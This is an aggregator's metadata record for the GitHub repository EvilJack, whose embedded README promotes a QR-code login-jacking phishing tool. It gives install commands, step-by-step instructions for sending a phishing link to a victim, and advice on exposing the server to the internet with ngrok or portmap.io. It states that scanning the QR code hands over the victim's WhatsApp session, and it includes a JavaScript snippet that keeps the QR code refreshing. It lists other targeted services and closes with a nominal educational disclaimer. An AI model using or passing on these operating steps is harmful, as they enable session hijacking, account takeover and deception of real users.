{"id":20986960,"url":"https://github.com/swagkarna/eviljack","last_synced_at":"2025-04-07T15:10:44.580Z","repository":{"id":185098853,"uuid":"671588779","full_name":"swagkarna/EvilJack","owner":"swagkarna","description":"QRLJacking A New Form of qr code phishing","archived":false,"fork":false,"pushed_at":"2024-11-19T18:51:14.000Z","size":2863,"stargazers_count":88,"open_issues_count":0,"forks_count":9,"subscribers_count":4,"default_branch":"main","last_synced_at":"2025-01-29T09:44:54.019Z","etag":null,"topics":["hacking","hacking-tool","phishing","phishing-attacks","qrljacking","whatsapp"],"latest_commit_sha":null,"homepage":"","language":"HTML","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/swagkarna.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2023-07-27T17:00:28.000Z","updated_at":"2025-01-24T10:54:58.000Z","dependencies_parsed_at":"2023-07-31T18:08:39.765Z","dependency_job_id":"cd3a01c8-b9be-47b0-aaaf-0383fdb04c9b","html_url":"https://github.com/swagkarna/EvilJack","commit_stats":null,"previous_names":["swagkarna/eviljack"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/swagkarna%2FEvilJack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/swagkarna%2FEvilJack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/swagkarna%2FEvilJack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/swagkarna%2FEvilJack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/swagkarna","download_url":"https://codeload.github.com/swagkarna/EvilJack/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":237513121,"owners_count":19322215,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["hacking","hacking-tool","phishing","phishing-attacks","qrljacking","whatsapp"],"created_at":"2024-11-19T06:15:32.175Z","updated_at":"2025-02-06T17:21:52.180Z","avatar_url":"https://github.com/swagkarna.png","language":"HTML","funding_links":[],"categories":[],"sub_categories":[],"readme":"\u003cp align=\"center\"\u003e\n\u003cimg src='https://github.com/swagkarna/EvilJack/blob/3c370b6c0aa3cbc0e094f0f04c0d838b2703fb4b/screenshots/evil.gif'\u003e\u003c/img\u003e\n\u003c/p\u003e\n\u003cp align=center\u003e  \n\u003ca href=https://github.com/swagkarna\u003e\u003cimg src=\"https://img.shields.io/badge/Author-Swagkarna-red.svg?style=for-the-badge\u0026label=Author\" /\u003e\u003c/a\u003e\n\n\u003cimg src=\"https://img.shields.io/badge/Version-1.0-brightgreen?style=for-the-badge\" \u003e \n\u003cimg src=\"https://img.shields.io/github/followers/swagkarna?label=Followers\u0026style=for-the-badge\"\u003e\n\u003c/p\u003e \n\n ---\n * **If you like the tool and for my personal motivation so as to develop other tools please  leave a +1 star** \n  ---\n## What is QRLJacking?\n---  \n\nQRLJacking, also known as Quick Response Code Login Jacking, is a straightforward yet highly malicious attack method that targets applications utilizing the \"Login with QR code\" feature as a supposedly secure means of account access. The primary objective of this attack is to hijack users' sessions, enabling attackers to gain unauthorized access to their accounts\n\n---\n## Installation ☑️\n\n```\npython -m venv venv\nvenv\\Scripts\\activate\npip install pyautogui pyzbar Pillow Flask pyocr pytesseract\n```\nIf you get dll error in pyzbar module visit this site:\nhttps://stackoverflow.com/questions/64570443/q-how-to-fix-the-missing-dependancies-in-pyzbar\n## Requirements 🧾\n\u003cp\u003e\nTo install Tesseract OCR on Windows, follow these steps:\n\n- Download the Tesseract OCR Installer:\n- Visit the Tesseract OCR GitHub page: https://github.com/tesseract-ocr/tesseract\n\n- Scroll down to the \"Downloads\" section and click on \"tesseract-ocr-w64-setup-v5.x.x.exe\" (where \"x.x\" represents the version number) to download the Windows installer for Tesseract OCR.\n\n## Run the Tesseract Installer\n- Double-click on the downloaded \"tesseract-ocr-w64-setup-v5.x.x.exe\" file to run the installer.\n\n- Choose Components (Optional)\nDuring the installation, you will be asked to select the components to install. You can keep the default options or customize them based on your needs. At a minimum, make sure the \"Tesseract OCR\" component is selected.\n\n- Set Installation Path (Optional)\nThe installer will prompt you to choose an installation directory. You can keep the default or specify a different one. If you change the path, make sure to remember it for later steps.\n## Add Tesseract to path \n### Just add the folder to the Path under Windows (not sure with Win7)\n- Control Panel \u003e System and Security \u003e System \u003e\n- Advanced system settings \u003e Advanced \u003e Environment variables \u003e PATH \u003e New\n#### Add this to path \n\n```\nC:\\Program Files\\Tesseract-OCR\n```\n\u003cimg src='https://github.com/swagkarna/EvilJack/blob/d32641a8c476c703dad6a6095bccbf5e5ca8e086/screenshots/Screenshot%20(108)_LI.jpg'\u003e\u003c/img\u003e\n\u003c/p\u003e\n\n### Note : After adding Tesseract-OCR to path make sure to restart your pc\n---\n## EvilJack in Action \n---\n- Run evil_jack.py and server.py \n- Open web.whatsapp.com in a separate window in your browser. Note: Do not close or minimize the window because EvilJack will continuously take screenshots of the QR code on web.whatsapp.com and send them to our phishing page. \n- Now send the phishing link `127.0.0.1:5000` to victim . Note the link `127.0.0.1:5000` only work if victim connected to same network .To perform the attack outside the wan use ngrok or portmap.io \n- After the victim scans the code, you will gain access to his WhatsApp session. Additionally, after the victim has scanned the QR code, he will be automatically redirected to a fake verification page\n---\n### \u003ca href='https://www.youtube.com/watch?v=7CE79X5tOi8'\u003ePortForwarding with portmap.io\u003c/a\u003e\n\n### Note : Make sure you forward Port:5000 in portmap.io\n---\n## Screenshots \n\u003cp align=\"left\"\u003e\n   \u003cimg src=\"https://github.com/swagkarna/EvilJack/blob/ce4d74ca266a4c4cee69c39021665e8a400e1537/screenshots/1.png\" width=750px height=500px\u003e\n   \u003c/p\u003e\n   \u003cp align=\"left\"\u003e\n   \u003cimg src=\"https://github.com/swagkarna/EvilJack/blob/ce4d74ca266a4c4cee69c39021665e8a400e1537/screenshots/2.png\" width=750px height=500px\u003e\n   \u003c/p\u003e\n   \u003cp align=\"left\"\u003e\n   \u003cimg src=\"https://github.com/swagkarna/EvilJack/blob/ce4d74ca266a4c4cee69c39021665e8a400e1537/screenshots/3.png\" width=750px height=500px\u003e\n   \u003c/p\u003e\n--- \n\n## EvilJack Demo   \n\nhttps://github.com/swagkarna/EvilJack/assets/46685308/77fd0f85-8f85-47f3-a4fd-a6ffca758cde\n\n---\n###  script  to auto click the QR code reload element on whatsappweb\n\nOpen chrome/firefox and navigate to `console tab` from developer option and paste the following code\n```\nfunction checkAndClickButton() {\n  const button = document.querySelector('.Jht5u');\n  if (button) {\n    button.click();\n  }\n}\n\n// Set an interval to periodically check and click the button (e.g., every 5 seconds)\nsetInterval(checkAndClickButton, 2000);\n```\n## EvilJack tested on following sites \n\n- [X] Whatsapp\n- [X] Telegram\n- [X] Discord\n- [X] steam\n- [X] AirDroid\n- [X] Tiktok \n---\n\n## Disclaimer ⚠️\n\u003cb\u003eswagkarna Provides no warranty and will not be responsible for any direct or indirect damage caused by this tool.\u003cbr\u003e\n  EVILJACK is built for Educational and Internal use ONLY.\u003c/b\u003e\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fswagkarna%2Feviljack","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fswagkarna%2Feviljack","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fswagkarna%2Feviljack/lists"}